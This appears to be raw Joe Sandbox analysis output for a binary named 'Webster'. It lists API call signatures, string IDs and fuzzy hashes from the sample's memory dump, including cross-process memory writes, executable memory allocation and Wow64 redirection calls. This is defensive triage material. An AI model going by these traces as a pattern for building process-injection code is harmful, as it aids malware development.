                                                                                  • Opcode Fuzzy Hash: 2d1568b63138cab642ab86432d36323c59a52094211cb7f46dc97b9b5328a0ea
                                                                                  • Instruction Fuzzy Hash: E851DF759042569FDF259F68C880AFE7BA4EF6A310F544056F892AB3D0D734AC82DB60
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset$_memmove
                                                                                  • String ID: ERCP
                                                                                  • API String ID: 2532777613-1384759551
                                                                                  • Opcode ID: 984c7fcfae446bced13e55669d1a2785d0955073f90ac4eaffad607dd0bd0682
                                                                                  • Instruction ID: cb0ce58888f362a89425ee0c01633b781347693821404ab6d6653ccef62c7558
                                                                                  • Opcode Fuzzy Hash: 984c7fcfae446bced13e55669d1a2785d0955073f90ac4eaffad607dd0bd0682
                                                                                  • Instruction Fuzzy Hash: 205192B2A007099BDF24CF65C9857AABBF4EF04314F24856EE94BDB291E770D985CB40
                                                                                  APIs
                                                                                    • Part of subcall function 00AE1CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AD9E4E,?,?,00000034,00000800,?,00000034), ref: 00AE1CE5
                                                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00ADA3F7
                                                                                    • Part of subcall function 00AE1C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00AD9E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00AE1CB0
                                                                                    • Part of subcall function 00AE1BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00AE1C08
                                                                                    • Part of subcall function 00AE1BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00AD9E12,00000034,?,?,00001004,00000000,00000000), ref: 00AE1C18
                                                                                    • Part of subcall function 00AE1BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00AD9E12,00000034,?,?,00001004,00000000,00000000), ref: 00AE1C2E
                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00ADA464
                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00ADA4B1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                  • String ID: @
                                                                                  • API String ID: 4150878124-2766056989
                                                                                  • Opcode ID: 6d20b0ddedc553adaae1cbc3b6d4d6aa3b86f5f92a7b4f57cd33a1e6eaa0548b
                                                                                  • Instruction ID: 8df46b7d15b8830dafbe9486f39d1890e708497e720f446b51878930710d4d3e
                                                                                  • Opcode Fuzzy Hash: 6d20b0ddedc553adaae1cbc3b6d4d6aa3b86f5f92a7b4f57cd33a1e6eaa0548b
                                                                                  • Instruction Fuzzy Hash: 1E413CB690122CBFDB10DBA4CD85ADEBBB8EF45300F104095FA55B7280DA706E85CBA1
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00B07A86
                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00B07A9A
                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B07ABE
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window
                                                                                  • String ID: SysMonthCal32
                                                                                  • API String ID: 2326795674-1439706946
                                                                                  • Opcode ID: 8672af9de06654fb935ecf039ab424f251fec977abcad8af15664d0ce40d50e9
                                                                                  • Instruction ID: 5decc111a196ddda296e25612d6c8070f88a127ceff3e2ecd30e878d77bef3d7
                                                                                  • Opcode Fuzzy Hash: 8672af9de06654fb935ecf039ab424f251fec977abcad8af15664d0ce40d50e9
                                                                                  • Instruction Fuzzy Hash: FF21AD32A50218AFDF218E54CC82FEE7BA9EB48724F114254FE156B1D0DAB1BC508BA0
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00B0826F
                                                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00B0827D
                                                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B08284
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$DestroyWindow
                                                                                  • String ID: msctls_updown32
                                                                                  • API String ID: 4014797782-2298589950
                                                                                  • Opcode ID: cce9c87349da0725f1c255ec5e4fed47044787b0038c9cca856227197d520373
                                                                                  • Instruction ID: db76b56287857ada73c0da75d781d06873e8b82a46f8510d3617a88dddb4134a
                                                                                  • Opcode Fuzzy Hash: cce9c87349da0725f1c255ec5e4fed47044787b0038c9cca856227197d520373
                                                                                  • Instruction Fuzzy Hash: C7217AB5604209AFDB10DF58DC85DA73BEDEB5A3A4B140199FA019B3A1CF71ED11CBA0
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00B07360
                                                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00B07370
                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00B07395
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$MoveWindow
                                                                                  • String ID: Listbox
                                                                                  • API String ID: 3315199576-2633736733
                                                                                  • Opcode ID: d0af6703f998236c4c3d1a068c7ab118e41d03a6125d90e089f5b17f418b6c38
                                                                                  • Instruction ID: c2f5a7b1966e3308be9307271c94a67af0105f2085994d787ac6d44990695690
                                                                                  • Opcode Fuzzy Hash: d0af6703f998236c4c3d1a068c7ab118e41d03a6125d90e089f5b17f418b6c38
                                                                                  • Instruction Fuzzy Hash: B621C532654118BFEF118F54CC85FBF7BAAEB89754F118164FD00971D0CA71AC529BA0
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00B07D97
                                                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00B07DAC
                                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00B07DB9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID: msctls_trackbar32
                                                                                  • API String ID: 3850602802-1010561917
                                                                                  • Opcode ID: d670e2ac4dcf5d8d8233edd249b47742740ce7ebc0067010ea429c4574ca17d6
                                                                                  • Instruction ID: 21ee117a263115badd329aa015f90e4e5f6404025e5f45eccad4d47a5f871f6f
                                                                                  • Opcode Fuzzy Hash: d670e2ac4dcf5d8d8233edd249b47742740ce7ebc0067010ea429c4574ca17d6
                                                                                  • Instruction Fuzzy Hash: 00110AB2644209BFDF245F64CC45FE77BE9EF89754F114229FA41A60D0DA71E851CB20
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00AC027A,?), ref: 00AFC6E7
                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00AFC6F9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                  • API String ID: 2574300362-1816364905
                                                                                  • Opcode ID: bc4a6176fe92c85b6760bec6609e327e72156f19117341f02fbebc43ee27324d
                                                                                  • Instruction ID: 3741b1511da35f30c6b10f61802e57f9dcf6c6d2f70eb3ef6eb0fba06f33f9e9
                                                                                  • Opcode Fuzzy Hash: bc4a6176fe92c85b6760bec6609e327e72156f19117341f02fbebc43ee27324d
                                                                                  • Instruction Fuzzy Hash: 78E08C3816070AABD7206B6AC948AA27AD8AF04364B908469F985D2220DBB4C8808B10
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00A94AF7,?), ref: 00A94BB8
                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A94BCA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                  • API String ID: 2574300362-1355242751
                                                                                  • Opcode ID: 8bd7dd62bef4d0504cf65728b3d167983e180b6a86ffb28f5998e452a1097731
                                                                                  • Instruction ID: 4dcf0a42ed97fdd7dc201ce91b6e83adbf44d294983011580463849d5511497a
                                                                                  • Opcode Fuzzy Hash: 8bd7dd62bef4d0504cf65728b3d167983e180b6a86ffb28f5998e452a1097731
                                                                                  • Instruction Fuzzy Hash: 24D0C2B0520712DFD7206F30DC08B4672D4AF04340F10CC69E481D6564DEB4C4D0C700
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00A94B44,?,00A949D4,?,?,00A927AF,?,00000001), ref: 00A94B85
                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A94B97
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                  • API String ID: 2574300362-3689287502
                                                                                  • Opcode ID: 0e121f28d8d3f1b51339f1427f89897abe1a4d90bffda93ac922c295fc58a493
                                                                                  • Instruction ID: a50a7c90f8af16cb21bfa0fd317bd0617fb7b5145e34f26d612efdd5117f9143
                                                                                  • Opcode Fuzzy Hash: 0e121f28d8d3f1b51339f1427f89897abe1a4d90bffda93ac922c295fc58a493
                                                                                  • Instruction Fuzzy Hash: 43D01270520756DFD7206F35DC18B4676D4AF04355F51C869E485E2564DAB4D4C0C610
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00B01696), ref: 00B01455
                                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B01467
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                  • API String ID: 2574300362-4033151799
                                                                                  • Opcode ID: 428d6eb36702fc46ce698849c55b8d8902042bf2de1d144a76acccedc23ddb55
                                                                                  • Instruction ID: 0ae3479feffaedd3a493322521c933fa4a89d3c14bd0899f14982815cdeaab40
                                                                                  • Opcode Fuzzy Hash: 428d6eb36702fc46ce698849c55b8d8902042bf2de1d144a76acccedc23ddb55
                                                                                  • Instruction Fuzzy Hash: 80D0EC315107129FD7205F7588086467AD4AF06395F11C86AA4D5E32A0DAB4D8D08A10
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00A95E3D), ref: 00A955FE
                                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00A95610
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                  • API String ID: 2574300362-192647395
                                                                                  • Opcode ID: 2c5ff5faa911ff1590bc2e2a4a23235edd6e6c281668e059e0ce8003dca8d673
                                                                                  • Instruction ID: b6521e1fc90d4fd276caba1fe76e9068a4f9459adbb400b12b1f9f2640992e72
                                                                                  • Opcode Fuzzy Hash: 2c5ff5faa911ff1590bc2e2a4a23235edd6e6c281668e059e0ce8003dca8d673
                                                                                  • Instruction Fuzzy Hash: 0CD0C234D30712DFD7206F34C84928676D4AF01391B84C829E481D2160DAB4C4C0C740
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00AF93DE,?,00B10980), ref: 00AF97D8
                                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00AF97EA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressLibraryLoadProc
                                                                                  • String ID: GetModuleHandleExW$kernel32.dll
                                                                                  • API String ID: 2574300362-199464113
                                                                                  • Opcode ID: 9f27618abca23767b5e7ba8e6a4ebf1a6be0e0c7ba381eb318f10a9c0a4391e5
                                                                                  • Instruction ID: b029210898dede58f376e6ef9b985a0b87fd45d25780095c44a0a84b27948f79
                                                                                  • Opcode Fuzzy Hash: 9f27618abca23767b5e7ba8e6a4ebf1a6be0e0c7ba381eb318f10a9c0a4391e5
                                                                                  • Instruction Fuzzy Hash: 75D0C730420317DFD720AF74D888796B2E4BF04381F50C82AF482EA160EFB4C8C0CA40
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 18d4307764dc75f25d2d1d8a7443e55ae5f1564472936850166d8b82ea6d31ee
                                                                                  • Instruction ID: b58041e328b954a39cd7e047ee3e6dc23bcc4092d1582a5fdffc6d8184cb3d3d
                                                                                  • Opcode Fuzzy Hash: 18d4307764dc75f25d2d1d8a7443e55ae5f1564472936850166d8b82ea6d31ee
                                                                                  • Instruction Fuzzy Hash: C8C17F75A00216EFCB18CF98C884EAEB7B5FF48714B158599E806EB351DB35ED81CB90
                                                                                  APIs
                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00AFE7A7
                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00AFE7EA
                                                                                    • Part of subcall function 00AFDE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00AFDEAE
                                                                                  • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00AFE9EA
                                                                                  • _memmove.LIBCMT ref: 00AFE9FD
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 3659485706-0
                                                                                  • Opcode ID: 0cd5f5e89fdd72273810c184051e80b0c955b80f98f7a8523deaddbad426e905
                                                                                  • Instruction ID: 560dab4a2a0ef22faa7ad1f1d576d9a9c7b776bf31411a65e1e552cb7b15cafb
                                                                                  • Opcode Fuzzy Hash: 0cd5f5e89fdd72273810c184051e80b0c955b80f98f7a8523deaddbad426e905
                                                                                  • Instruction Fuzzy Hash: 4CC18971A083058FC714EF68C48096ABBE4FF89754F04896EF999DB361D731E946CB82
                                                                                  APIs
                                                                                  • CoInitialize.OLE32(00000000), ref: 00AF87AD
                                                                                  • CoUninitialize.OLE32 ref: 00AF87B8
                                                                                    • Part of subcall function 00B0DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00AF8A0E,?,00000000), ref: 00B0DF71
                                                                                  • VariantInit.OLEAUT32(?), ref: 00AF87C3
                                                                                  • VariantClear.OLEAUT32(?), ref: 00AF8A94
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                  • String ID:
                                                                                  • API String ID: 780911581-0
                                                                                  • Opcode ID: 70852f16d7c38be48d3a1ea79c2fb11409981f348264d73a38cc232f45c327c5
                                                                                  • Instruction ID: b447d682520c8902b4ba251550ce9fe271f241135e0c5061653f25815c88cd06
                                                                                  • Opcode Fuzzy Hash: 70852f16d7c38be48d3a1ea79c2fb11409981f348264d73a38cc232f45c327c5
                                                                                  • Instruction Fuzzy Hash: 53A17A35604B069FD710EFA4C581B2AB7E4FF88354F148849FA969B3A1DB74ED40CB92
                                                                                  APIs
                                                                                  • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00B13C4C,?), ref: 00AD8308
                                                                                  • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00B13C4C,?), ref: 00AD8320
                                                                                  • CLSIDFromProgID.OLE32(?,?,00000000,00B10988,000000FF,?,00000000,00000800,00000000,?,00B13C4C,?), ref: 00AD8345
                                                                                  • _memcmp.LIBCMT ref: 00AD8366
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmp
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: FromProg$FreeTask_memcmp
                                                                                  • String ID:
                                                                                  • API String ID: 314563124-0
                                                                                  • Opcode ID: afcb37a6f2f6976dfa9627ede599b9be21e4f626d7b99c05a413e004d8af7d62
                                                                                  • Instruction ID: 6b0518f31e1ddc3859ed9fc478a5d77bcce59d238950c93b428c900114ea35e2
                                                                                  • Opcode Fuzzy Hash: afcb37a6f2f6976dfa9627ede599b9be21e4f626d7b99c05a413e004d8af7d62
                                                                                  • Instruction Fuzzy Hash: 62814971A00109EFCB04DF94C988EEEB7B9FF89715F204599E516AB250DB71AE06CB60
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
